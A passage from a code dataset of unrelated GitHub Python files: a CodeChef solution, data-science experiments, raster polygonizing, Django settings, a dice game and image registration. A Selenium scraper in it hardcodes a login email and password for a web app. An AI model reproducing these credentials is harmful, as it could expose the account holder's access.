1\r\n\r\n\t\t\tprev = i \r\n\r\n\t\t\tif count > 1:\r\n\r\n\t\t\t\tprint(\"NO\")\r\n\t\t\t\tbreak\r\n\r\n\t\telse:\r\n\r\n\t\t\tif count == 0:\r\n\r\n\t\t\t\tprint(\"YES\")\r\n\t\t\t\r\n\t\t\telse:\r\n\r\n\t\t\t\tif a[0] >= a[-1]:\r\n\r\n\r\n\t\t\t\t\tprint(\"YES\")\r\n\r\n\t\t\t\telse:\r\n\r\n\t\t\t\t\tprint(\"NO\")\r\n\r\n\t\tt -= 1\r\n\r\nmain()","repo_name":"priyo97/CodeChef-snackdown19","sub_path":"1A/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25169384365","text":"import json\nfrom os import path, mkdir\n\ndef check_create(folder):\n\tif path.exists(folder): \n\t\tprint(f'Folder {folder} already exists.')\n\telse:\n\t\tmkdir(folder)\n\t\tprint(f'Folder {folder} created!')\n\ndef format(content, formatter):\n\tif not formatter: return content\n\tif 'json': return json.dumps(content, indent=2)\n\ndef write_file(filename, content, formatter=None, folder=None):\n\tif folder: filename = folder + ('/' if folder[-1] != '/' else '') + filename\n\twith open(filename, 'w+') as f:\n\t\tcontent = format(content, formatter)\n\t\tf.write(content)\n","repo_name":"produdez/kangaroo-detection","sub_path":"src/utils/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26274503615","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 23 20:03:45 2021\n\n@author: Shay Kreymer\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport utils\n\nnp.random.seed(10)\n\nL = 8\nN = 1.23 * 10**7\nN = int(N)\ngamma = 0.2\n\nx = np.random.rand(L)\nx = x / np.linalg.norm(x)\ny_clean = utils.generate_micrograph_1d(x, gamma, L, N)\n\nSNR = 0.5\nsigma2 = (np.linalg.norm(x) ** 2) / (L * SNR)\ny = y_clean + np.random.normal(loc=0, scale=np.sqrt(sigma2), size=np.shape(y_clean))\n\nshifts_2nd = utils.shifts_2nd(L)\n\nshifts_3rd = utils.shifts_3rd_reduced(L)\n\n\nL2 = len(shifts_2nd)\nL3 = len(shifts_3rd)\nW = utils.calc_W_heuristic(shifts_2nd, shifts_3rd)\n\n\ngamma0 = 0.18\n\nestimations_mom = []\nestimations_gmm = []\n\nx0 = np.random.rand(L)\nx0 = (np.linalg.norm(x) ** 2) * x0 / np.linalg.norm(x0)\n\nx_gamma0 = np.concatenate((x0, np.array([gamma0])))\n \nsizes = np.array([10**5, 10**6, 10**7])\nfor sz in sizes:\n sz = int(sz)\n yi = y[:sz]\n\n ac1_yi = utils.ac1(yi)\n \n ac2_yi = np.zeros((len(shifts_2nd), ))\n for (i, shift) in enumerate(shifts_2nd):\n ac2_yi[i] = utils.ac2(yi, shift)\n \n ac3_yi = np.zeros((len(shifts_3rd), ))\n for (i, shifts) in enumerate(shifts_3rd):\n ac3_yi[i] = utils.ac3(yi, shifts[0], shifts[1])\n \n samplesi = utils.sample(yi, L)\n del yi\n \n estimation_mom = utils.opt(x_gamma0, ac1_yi, ac2_yi, ac3_yi, shifts_2nd, shifts_3rd, sigma2, W)\n estimations_mom.append(estimation_mom)\n \n f_gmm = utils.calc_function_gmm(samplesi, gamma0, x0, shifts_2nd, shifts_3rd, sigma2)\n del samplesi\n cov_f = np.cov(f_gmm)\n del f_gmm\n W_gmm = np.linalg.inv(np.sqrt(N) * cov_f)\n W_gmm = W_gmm\n \n estimation_gmm = utils.opt(x_gamma0, ac1_yi, ac2_yi, ac3_yi, shifts_2nd, shifts_3rd, sigma2, W_gmm)\n estimations_gmm.append(estimation_gmm)\n \nerrs_mom = [np.linalg.norm(estimations_mom[i].x[:-1] - x) / np.linalg.norm(x) for i in range(3)]\nerrs_gmm = [np.linalg.norm(estimations_gmm[i].x[:-1] - x) / np.linalg.norm(x) for i in range(3)]\n# %% plots\nplt.close(\"all\")\nwith plt.style.context('ieee'):\n fig = plt.figure()\n plt.plot(x, label='Ground truth', lw=2)\n plt.plot(estimations_mom[0].x[:-1], lw=2, label='Autocorrelation analysis')\n plt.plot(estimations_gmm[0].x[:-1], lw=2, label='Generalized autocorrelation analysis')\n plt.ylim((0, 0.6))\n plt.legend(loc=1, fontsize=6)\n plt.xlim((0, 7))\n fig.tight_layout()\n plt.show()\n\n fig = plt.figure()\n plt.plot(x, label='Ground truth')\n plt.plot(estimations_mom[1].x[:-1], lw=2, label='Autocorrelation analysis')\n plt.plot(estimations_gmm[1].x[:-1], lw=2, label='Generalized autocorrelation analysis')\n plt.legend()\n plt.ylim((0, 0.6))\n plt.legend(loc=1, fontsize=6)\n plt.xlim((0, 7))\n fig.tight_layout()\n plt.show()\n \n fig = plt.figure()\n plt.plot(x, label='Ground truth')\n plt.plot(estimations_mom[2].x[:-1], lw=2, label='Autocorrelation analysis')\n plt.plot(estimations_gmm[2].x[:-1], lw=2, label='Generalized autocorrelation analysis')\n plt.legend()\n plt.ylim((0, 0.6))\n plt.legend(loc=1, fontsize=6)\n plt.xlim((0, 7))\n fig.tight_layout()\n plt.show()\n \n fig = plt.figure()\n plt.loglog(sizes, errs_mom, 'ro-', lw=2, label='Autocorrelation analysis')\n plt.loglog(sizes, errs_gmm, 'bo--', lw=2, label='Generalized autocorrelation analysis')\n plt.xticks(sizes)\n plt.xlabel('N')\n plt.ylabel('recovery error')\n plt.legend(loc=1, fontsize=6)\n fig.tight_layout()\n plt.show()\n \n","repo_name":"krshay/MTD-GMM","sub_path":"experiment_recovery.py","file_name":"experiment_recovery.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40732446470","text":"def bsearch(x, xs): # Списъкът трябва да е сортиран, ако не е - не работи!\n\n left = 0\n right = len(xs) - 1\n\n while left <= right:\n\n mid = (left + right) // 2\n\n if xs[mid] == x:\n return True\n elif x < xs[mid]:\n right = mid - 1\n else:\n left = mid + 1\n\n return False\n\nprint(bsearch(5, [4, 5, 7, 8, 9, 10, 12, 999])) # True\nprint(bsearch(3, [4, 5, 7, 8, 9, 10, 12, 999])) # False\nprint(bsearch(5, [4, 5, 5, 5, 7, 8, 9, 10, 12, 999])) # True\nprint(bsearch(0, [])) # False\n","repo_name":"AnetaStoycheva/Programming0_HackBulgaria","sub_path":"Week 10/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"73259907026","text":"from sklearn.linear_model import ElasticNet, Lasso, BayesianRidge, LassoLarsIC\nfrom sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\nfrom sklearn.kernel_ridge import KernelRidge\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import RobustScaler\nfrom sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone\nfrom sklearn.model_selection import KFold, cross_val_score, train_test_split\nfrom sklearn.metrics import mean_squared_error\nimport xgboost as xgb\nimport lightgbm as lgb\n\nimport numpy as np\n\n\n#1. Define a cross validation strategy\nn_folds = 5\n\ntrain.drop(\"Id\", axis = 1, inplace = True)\ntest.drop(\"Id\", axis = 1, inplace = True)\n\ndef rmsle_cv(model):\n kf = KFold(n_folds, shuffle=True, random_state=42).get_n_splits(train.values)\n rmse= np.sqrt(-cross_val_score(model, train.values, y_train, scoring=\"neg_mean_squared_error\", cv = kf))\n return(rmse)\n\n#Models\n\nlasso = make_pipeline(RobustScaler(), Lasso(alpha =0.0005, random_state=1))\nENet = make_pipeline(RobustScaler(), ElasticNet(alpha=0.0005, l1_ratio=.9, random_state=3))\nKRR = KernelRidge(alpha=0.6, kernel='polynomial', degree=2, coef0=2.5)\n\nGBoost = GradientBoostingRegressor(n_estimators=3000, learning_rate=0.05,\n max_depth=4, max_features='sqrt',\n min_samples_leaf=15, min_samples_split=10, \n loss='huber', random_state =5)\n\nmodel_xgb = xgb.XGBRegressor(colsample_bytree=0.4603, gamma=0.0468, \n learning_rate=0.05, max_depth=3, \n min_child_weight=1.7817, n_estimators=2200,\n reg_alpha=0.4640, reg_lambda=0.8571,\n subsample=0.5213, silent=1,\n random_state =7, nthread = -1)\n\nmodel_lgb = lgb.LGBMRegressor(objective='regression',num_leaves=5,\n learning_rate=0.05, n_estimators=720,\n max_bin = 55, bagging_fraction = 0.8,\n bagging_freq = 5, feature_fraction = 0.2319,\n feature_fraction_seed=9, bagging_seed=9,\n min_data_in_leaf =6, min_sum_hessian_in_leaf = 11)\n\nscore = rmsle_cv(lasso)\nprint(\"\\nLasso score: {:.4f} ({:.4f})\\n\".format(score.mean(), score.std()))\nscore = rmsle_cv(ENet)\nprint(\"ElasticNet score: {:.4f} ({:.4f})\\n\".format(score.mean(), score.std()))","repo_name":"dashmoment/kaggle_house_price","sub_path":"stacked_regrssion/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70206817427","text":"''' 202207 Polygonize a raster mask (values 0 or 1, data type and format otherwise not assumed)\n\n(*) Output in same coordinate reference system as source data \n\nBased on a module by Sybrand Strauss: \n https://github.com/bcgov/wps/blob/story/classify_hfi/api/scripts/polygonize_hfi.py#L52\n\n20230825 '''\nimport os\nimport sys\nimport json\nimport time\nimport tempfile\nimport numpy as np\nfrom osgeo import ogr\nfrom osgeo import gdal\nfrom osgeo import osr\nfrom misc import exist, err, args, run, sep\n\ndef is_dst():\n t = time.localtime()\n print(t)\n return t.tm_isdst\n\nfire_number = None\nimage_date = None\ntime_stamp = None\n\npwd = os.path.abspath( os.getcwd())\nw = pwd.split(sep)\nif w[-3] == 'active':\n print(\"ACTIVE\")\n print(\"Fire_number\", w[-2])\n print(\"Image date\", w[-1])\n fire_number = w[-2]\n image_date = w[-1]\n \n # get image timstamp(s): assume the most frequent of the \nelse:\n print(w)\n print(pwd)\n err('required to be run from within the active/FIRE_NUMBER folder')\n\nts_count = {} # count different timestamps: most frequent this folder assumed. Good practice to run this from active/FIRE_NUMBER type folder.\nlines = [x.strip() for x in os.popen(\"ls -1 S2*\").readlines()]\nfor line in lines:\n line = line.strip()\n try:\n w = line.split('_')\n print(w)\n\n time_stamp = int(w[2].split('T')[1][:4]) - (700 if is_dst()==1 else 800)\n # todo: accumulate/count these values in ts_count, retain key with largest count.\n except:\n pass\n# sys.exit(1)\n\nif len(args) < 2:\n err('python3 binary_polygonize.py [input raster mask file 1/0 values]')\n\n# let's crop the result\nrun('rm -f ' + args[1] + '*pad*')\nrun('rm -f ' + args[1] + '*crop*')\nif not exist(args[1] + '_crop.bin_pad.bin'):\n run('crop ' + args[1])\n run('pad ' + args[1] + '_crop.bin 111')\n run('cp ' + args[1] + '_crop.bin_pad.bin ' + args[1])\n run('cp ' + args[1] + '_crop.bin_pad.hdr ' + args[1][:-3] + 'hdr')\nrun('po sub.bin ' + args[1] + ' sub_project.bin')\nrun('mv sub_project.bin sub.bin')\nrun('mv sub_project.hdr sub.hdr')\n\n\ndef create_in_memory_band(data: np.ndarray, cols, rows, projection, geotransform):\n mem_driver = gdal.GetDriverByName('MEM')\n dataset = mem_driver.Create('memory', cols, rows, 1, gdal.GDT_Byte)\n dataset.SetProjection(projection)\n dataset.SetGeoTransform(geotransform)\n band = dataset.GetRasterBand(1)\n band.WriteArray(data)\n return dataset, band\n\ndef polygonize(geotiff_filename, filename):\n raster = gdal.Open(geotiff_filename, gdal.GA_ReadOnly)\n band = raster.GetRasterBand(1)\n src_projection, geotransform = raster.GetProjection(), raster.GetGeoTransform()\n print(src_projection)\n #print(geotransform)\n rows, cols = band.YSize, band.XSize\n \n # source coordinate reference system\n srs = osr.SpatialReference()\n srs.ImportFromWkt(raster.GetProjectionRef()) # as in: https://trac.osgeo.org/gdal/browser/trunk/gdal/swig/python/scripts/gdal_polygonize.py#L237\n # generate mask data\n mask_data = np.where(band.ReadAsArray() == 0, False, True)\n mask_ds, mask_band = create_in_memory_band(mask_data, cols, rows, src_projection, geotransform)\n\n # Create output \n driver = ogr.GetDriverByName('ESRI Shapefile') #GeoJSON')\n dst_ds = driver.CreateDataSource(filename)\n # dst_ds.SetProjection(src_projection) # AttributeError: 'DataSource' object has no attribute 'SetProjection'\n # dst_ds.SetGeoTransform(geotransform)\n\n # add layer\n dst_layer = dst_ds.CreateLayer('fire') # not sure how to get the CRS info into the output\n # dst_layer.SetProjection(src_projection) # AttributeError: 'Layer' object has no attribute 'SetProjection'\n # dst_layer.SetGeoTransform(geotransform)\n\n field_name = ogr.FieldDefn(\"fire\", ogr.OFTInteger)\n field_name.SetWidth(24)\n dst_layer.CreateField(field_name)\n gdal.Polygonize(band, mask_band, dst_layer, 0, [], callback=None) # polygonize\n dst_ds.FlushCache()\n del dst_ds, raster, mask_ds # print(f'{filename} written')\n open(args[1] + '.prj', 'wb').write(str(src_projection).encode())\n\npolygonize(args[1],\n args[1] + '.shp')\n\nrun(' '.join(['ogr2ogr -f \"KML\"',\n args[1] + '.kml',\n args[1] + '.shp']))\n\nif True:\n run('sentinel2_trace_active_alpha.py ' + args[1])\n\n\n# assume were in an active/fire_number directory, rename the files accordingly for the product format specification.\n\nif fire_number is not None and image_date is not None:\n print(\"ACTIVE\")\n # have fire_number (fire ID) and image date. \n # find the symbolic links to S2 data files, in the present directory. And/or real files (legacy compatibility)\n # ls -1 S2*.bin\n # count the date-time stamps, use the most-ocurring observed pair (date, time)\n\n # current year:\n # time.localtime()\n # time.struct_time(tm_year=2023\n current_year = str(time.localtime().tm_year).zfill(4)[2:4] \n print(\"current_year\", current_year)\n\n file_string = '_'.join([current_year, str(fire_number), str(image_date), str(time_stamp), 'detection', 'sentinel2'])\n print(file_string)\n\n lines = [x.strip() for x in os.popen('ls -1atr result*.kml').readlines()]\n recent_kml = lines[-1]\n print(\"recent_kml\", recent_kml) \n run('cp ' + recent_kml + ' ' + file_string + '.kml')\n\n lines = [x.strip() for x in os.popen('ls -1atr poly*.kml').readlines()]\n recent_alpha = lines[-1]\n print(\"recent_alpha\", recent_alpha)\n run('cp ' + recent_alpha + ' ' + file_string + '_alpha.kml')\n\n\n recent_tif = 'sub.bin_ht.bin_smult.tif'\n run('rm -f ' + recent_tif)\n if not exist(recent_tif):\n run('envi2tif.py sub.bin')\n run('cp ' + recent_tif + ' ' + file_string + '.tif')\n\n run('chmod 755 23_*')\n\n'''\nosgeo.ogr.GetDriverByName vs osgeo.gdal.GetDriverByName\nOk - so - ogr == vectors ; gdal == raster\nhttps://pcjericks.github.io/py-gdalogr-cookbook/projection.html#get-projection\n'''\n","repo_name":"bcgov/wps-research","sub_path":"py/binary_polygonize.py","file_name":"binary_polygonize.py","file_ext":"py","file_size_in_byte":5932,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"38585716242","text":"\"\"\"\nDjango base settings for start a project\n\"\"\"\n\n# -*- coding: utf-8 -*-\nimport os\nfrom django.core.urlresolvers import reverse_lazy\n# Normally you should not import ANYTHING from Django directly\n# into your settings, but ImproperlyConfigured is an exception.\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom unipath import Path\n# settings.py\nfrom os.path import join, dirname\nimport dotenv\n\ndef get_env_setting(setting):\n \"\"\" Get the environment setting or return exception \"\"\"\n try:\n return os.environ[setting]\n except KeyError:\n error_msg = \"Set the %s env variable\" % setting\n raise ImproperlyConfigured(error_msg)\n\n####### PATH CONFIGURATION ###########\nPROJECT_DIR = Path()\n\n\ndef rel(*x):\n return PROJECT_DIR.child(*x)\n\nos.sys.path.insert(0, rel('apps'))\n\nMEDIA_ROOT = os.environ.get('MEDIA_ROOT', rel('public', 'media'))\n\nMEDIA_URL = '/media/'\n\nIMAGE_ROOT = os.path.join(MEDIA_ROOT, 'images')\nIMAGE_URL = os.path.join(MEDIA_URL, 'images/')\n\nSTATIC_ROOT = os.environ.get('STATIC_ROOT', rel('public', 'static'))\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = ()\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n######################################\n\n########## ENVIRONMENT SETTINGS ######\ndotenv.read_dotenv()\n\nSECRET_KEY = get_env_setting('SECRET_KEY')\nALLOWED_HOSTS = get_env_setting('ALLOWED_HOSTS').split()\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = bool(os.environ.get('DEBUG', False))\n######################################\n\n# Application definition\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.security.SecurityMiddleware',\n # TODO think best place for this middleware\n 'common.middleware.CORSAllowAllMiddleware',\n)\n\nROOT_URLCONF = 'common.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'wsgi.application'\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.8/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nSITE_ID = 1\n\n################### PROJECT ##########################\n\n# celery\nBROKER_URL = 'redis://localhost'\nCELERY_RESULT_BACKEND = 'redis://localhost:6379/0'\nCELERYD_POOL_RESTARTS = True\n\nREST_FRAMEWORK = {\n # Use Django's standard `django.contrib.auth` permissions,\n # or allow read-only access for unauthenticated users.\n # 'DEFAULT_PERMISSION_CLASSES': [\n # 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'\n # ]\n 'PAGE_SIZE': 10,\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework.authentication.BasicAuthentication',\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework.authentication.TokenAuthentication'\n )\n}\nREST_AUTH_SERIALIZERS = {\n 'TOKEN_SERIALIZER': 'common.serializers.CustomTokenSerializer',\n}\nREST_SESSION_LOGIN = False\nAUTH_USER_MODEL = 'auth.User'\nAUTHENTICATION_BACKENDS = (\n # Needed to login by username in Django admin, regardless of `allauth`\n 'django.contrib.auth.backends.ModelBackend',\n # `allauth` specific authentication methods, such as login by e-mail\n)\nLOGIN_URL = '/'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_CONFIRM_EMAIL_ON_GET = True\nLOGIN_ON_EMAIL_CONFIRMATION = '/'\n\nACCOUNT_ADAPTER = 'common.adapter.CustomAccountAdapter'\nURL_FRONT = 'http://localhost:8080/#/'\n######################################################","repo_name":"xgalv00/wall-server","sub_path":"settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10514506321","text":"from selenium import webdriver\nimport time\nimport os\nimport openpyxl\nfrom openpyxl import Workbook\n#options = webdriver.ChromeOptions()\n#options.add_argumnet(\"__incognito\")\ndriver = webdriver.Chrome(\"E:/chromedriver/chromedriver.exe\") #chrome_options=options\n#driver.maximize_window()\ndriver.get(\"https://devicemon.azurewebsites.net\")\ndriver.find_element_by_xpath(\"//*[@id='i0116']\").send_keys(\"test.ncadminuser@ha-efbops.com\")\ndriver.implicitly_wait(50)\ndriver.find_element_by_id(\"idSIButton9\").click()\n#driver.implicitly_wait(40)\ndriver.find_element_by_xpath(\"//*[@id='i0118']\").send_keys(\"Nathcorp!1\")\ntime.sleep(4)\ndriver.find_element_by_id(\"idSIButton9\").click()\ndriver.find_element_by_id(\"idSIButton9\").click()\n#driver.implicitly_wait(30)\ndriver.find_element_by_id(\"TableSearch\").send_keys(\"014269671953\")\ndriver.find_element_by_xpath(\"//a[@id='App']\").click()\ntime.sleep(2)\n\nrow_count = len(driver.find_elements_by_xpath(\"//*[@id='PidAppInfoDetails']/tr \"))\ncol_count = len(driver.find_elements_by_xpath(\"//*[@id='PidAppInfoDetails']/tr[1]/td\"))\n\nprint(row_count)\nprint(col_count)\nfirst_part = \"//*[@id='PidAppInfoDetails']/tr[ \"\nsecond_part = \"]/td[\"\nThird_part = \"]\"\nfor n in range(1,row_count+1):\n for m in range(1, col_count + 1):\n final_path = first_part+str(n)+second_part+str(m)+Third_part\n table_data= driver.find_element_by_xpath(final_path).text\n fname= 'applist.xlsx'\n if(os.path.exists(fname)):\n Workbook =openpyxl.load_workbook(fname)\n Worksheet = Workbook.get_sheet_by_name('Sheet')\n else:\n Workbook =Workbook()\n Worksheet =Workbook.active\n Worksheet.cell(row=n,column=m).value = table_data\n Workbook.save(fname)\n print(table_data,end =\" \")\n print(\"\")\n #\ndriver.find_element_by_xpath(\"//*[@id='PidAppInfoPopup']/div/div/div[3]/button\").click()\ndriver.find_element_by_xpath(\"//*[@id='014269671953]\").click()\n\n\n\ndriver.find_element_by_xpath(\"//*[@id='UserLoginInfoPopup]/div/div/div[3]/button\").click()\n\n'''\ndef app_list(url):\n thepage= urllib.request.urlopen(url) //*[@id=\"UserLoginInfoPopup\"]/div/div/div[3]/button\n soupdata =BeautifulSoup(thepage,\"csv\")\n return soupdata\nsoup= app_list(\"https://devicemon.azurewebsites.net\")\nfor record in soup.findAll('tr'):\n for data in record.findAll('td')\n //*[@id=\"PidAppInfoDetails\"]/tr[1] \n'''\n'''\nposts= driver.find_element_by_id(\"PidAppInfoDetails\")\nfor post in posts:\n print(post.text)\n'''\n'''driver.close()'''","repo_name":"Rajni26kumari/firstpython1","sub_path":"Test/Test1.1.py","file_name":"Test1.1.py","file_ext":"py","file_size_in_byte":2513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30878387501","text":"#In this program, we roll two fair dice and the results will determine the next step to take\nfrom random import randint\nfrom time import sleep\n\n#In this first section, all the needed functions will be declared\n#Play option: This function determines whether the user wants to play or not\ndef playOption():\n playOrNot = input(\"Do you want to roll the dice or exit the game? \\n Type Y/N to indicate your choice: \")\n playOrNot = playOrNot.capitalize()\n if playOrNot == \"N\":\n print(\"Goodbye. See you later\")\n exit()\n elif playOrNot == \"Y\":\n print(f\"Welcome {username}, your dice will now be rolled\") \n else: \n print(f\"{username}, The game will now exit because you put in an invalid command.\\nGoodbye!\")\n exit() \n\n#Roll dice: This function rolls the dice on behalf of the user\ndef rollDice():\n print(\"Rolling die...\")\n sleep(1)\n die_roll_one = randint(1,6)\n die_roll_two = randint(1,6)\n print(f\"You need double sixes to start the game\")\n if die_roll_one == die_roll_two == 6:\n print(f\"Amazing {username}, you rolled double sixes. \\nYou can start the game! \")\n exit()\n else:\n print(f\"You rolled {die_roll_one} and {die_roll_two}.\\nPlease try again\")\n\n#---------------Running the code-----------------------------------------------------\nusername = input(\"Please enter your name: \")\nusername = username.capitalize()\n\nplayOption()\n\n#Determine the outcome of the die throw\ncount = 10\nwhile count > 0:\n#Roll the die \n rollDice()\n count = count -1\nprint(f\"Uh oh! {username}, you have exhausted the number of times you can throw.\\nYou will now exit the game! \") \n\n\n\n","repo_name":"ugocuevas/mycodehub","sub_path":"rolldice2.py","file_name":"rolldice2.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"70975770705","text":"\r\nimport os\r\nos.system(\"cls\")\r\n\r\n\r\n\r\nnota1 = int(input(\"primera nota: \"))\r\nnota2 = int(input(\"segunda nota: \"))\r\nnota3 = int(input(\"tercera nota: \"))\r\n\r\nif nota3 > 10 and nota3 <=18 and nota1 < 21 and nota2 < 21: \r\n nota3_p = nota3 + 2\r\n print(f\"Nota 3 con puntos: {nota3_p: .2f}\")\r\n p = (nota1 + nota2 + nota3_p) / 3\r\n print(f\"PROMEDIO: {p: .2f}\")\r\nelif nota1 > 20 or nota2 > 20 or nota3 > 20: \r\n print(f\"NOTA INCORRECTA \")\r\nelse: \r\n p = (nota1 + nota2 + nota3) / 3\r\n print(f\"PROMEDIO: {p: .2f}\")\r\n","repo_name":"AnderC23/Ejercicios-de-Python---Didacticas","sub_path":"E-Condicionales/Ejercicio_04.py","file_name":"Ejercicio_04.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40278490135","text":"###################################################\n# this file is to implement the Demons arithmetic #\n###################################################\nimport math\n\nimport numpy as np\nimport cv2\n\n\ndef transform(img: np.ndarray, t_x, t_y):\n shape = img.shape\n assert len(shape) >= 2\n if len(shape) == 2:\n np.expand_dims(img, axis=2)\n\n H, W, C = shape\n assert C == 1\n H, W, C = shape\n t_img = np.zeros_like(img)\n grid_x, grid_y = np.meshgrid(range(W), range(H))\n\n t_idx_x = np.clip(np.squeeze(t_x) + grid_x, 0, W - 1)\n t_idx_y = np.clip(np.squeeze(t_y) + grid_y, 0, H - 1)\n\n for i in range(W):\n for j in range(H):\n x, y = t_idx_x[j, i], t_idx_y[j, i]\n l_x = int(math.floor(x))\n r_x = min(l_x + 1, W - 1)\n t_y = int(math.floor(y))\n b_y = min(t_y + 1, H - 1)\n i0, i1, i2, i3 = img[t_y, l_x], img[t_y, r_x], img[b_y, l_x], img[b_y, r_x]\n t_img[j, i, ] = linear_interpolate(i0, i1, i2, i3, x - l_x, y - t_y)\n\n return t_img\n\n\ndef linear_interpolate(i0, i1, i2, i3, dx, dy):\n return i0 * dx * (1 - dy) + i1 * dx * dy + i2 * (1 - dx)*(1 - dy) + i3 * (1 - dx) * dy\n\n\ndef demons(moving_image: np.ndarray, fixed_image: np.ndarray):\n\n m_shape = moving_image.shape\n f_shape = fixed_image.shape\n assert m_shape == f_shape\n\n if len(m_shape) < 3:\n moving_image = np.expand_dims(moving_image, -1)\n fixed_image = np.expand_dims(fixed_image, -1)\n\n t_x = np.zeros(moving_image.shape, dtype='float')\n t_y = np.zeros(moving_image.shape, dtype='float')\n org_image = moving_image.copy()\n for i in range(200):\n if (i % 5) == 0:\n cv2.imwrite(r'D:\\Projects\\Python\\DL\\ClockInDemo\\data\\res_' + str(i) + '.jpg', moving_image)\n # cv2.imwrite(r'D:\\Projects\\Python\\DL\\ClockInDemo\\data\\res_fixed_' + str(i) + '.jpg', fixed_image)\n diff = -np.squeeze(moving_image - fixed_image)\n [d_m_y, d_m_x] = np.gradient(np.squeeze(moving_image))\n\n d2 = d_m_x**2 + d_m_y**2\n\n u_x = -(diff * d_m_x) / (d2 + diff**2)\n u_y = -(diff * d_m_y) / (d2 + diff**2)\n\n u_x[np.isnan(u_x)] = 0\n u_y[np.isnan(u_y)] = 0\n u_x[np.isinf(u_x)] = 0\n u_y[np.isinf(u_y)] = 0\n\n u_x_s = gaussian_filter(u_x, 3)\n u_y_s = gaussian_filter(u_y, 3)\n\n u_x_s /= np.max(u_x_s) * 2\n u_y_s /= np.max(u_y_s) * 2\n\n t_x = t_x + u_x_s\n t_y = t_y + u_y_s\n\n # t_x = gaussian_filter(t_x, 3, 1)\n # t_y = gaussian_filter(t_y, 3, 1)\n\n moving_image = transform(org_image, t_x, t_y)\n return moving_image\n\n\ndef gaussian_filter(img: np.ndarray, K_size=3, sigma=1.3):\n if len(img.shape) == 3:\n H, W, C = img.shape\n else:\n img = np.expand_dims(img, axis=-1)\n H, W, C = img.shape\n ## Zero padding\n\n pad = K_size // 2\n out = np.zeros((H + pad * 2, W + pad * 2, C), dtype=np.float)\n out[pad: pad + H, pad: pad + W] = img.copy().astype(np.float)\n\n ## prepare Kernel\n K = np.zeros((K_size, K_size), dtype=np.float)\n for x in range(-pad, -pad + K_size):\n for y in range(-pad, -pad + K_size):\n K[y + pad, x + pad] = np.exp(-(x ** 2 + y ** 2) / (2 * (sigma ** 2)))\n\n K /= (2 * np.pi * sigma * sigma)\n K /= K.sum()\n tmp = out.copy()\n\n # filtering\n for y in range(H):\n for x in range(W):\n for c in range(C):\n out[pad + y, pad + x, c] = np.sum(K * tmp[y: y + K_size, x: x + K_size, c])\n\n out = np.clip(out, 0, 255)\n out = out[pad: pad + H, pad: pad + W, ...]\n\n return out\n\n\nif __name__ == \"__main__\":\n m_img = cv2.imread(r'D:\\Projects\\Python\\DL\\ClockInDemo\\data\\test_1.jpg')\n\n m_img_gray = cv2.cvtColor(m_img, cv2.COLOR_RGB2GRAY)\n f_img = cv2.imread(r'D:\\Projects\\Python\\DL\\ClockInDemo\\data\\test_2.jpg')\n f_img_gray = cv2.cvtColor(f_img, cv2.COLOR_RGB2GRAY)\n # cv2.imshow(\"image\", f_img_gray)\n # cv2.waitKey(0)\n\n img = demons(m_img_gray, f_img_gray)\n\n cv2.namedWindow(\"image\")\n cv2.imshow(\"image\", img)\n 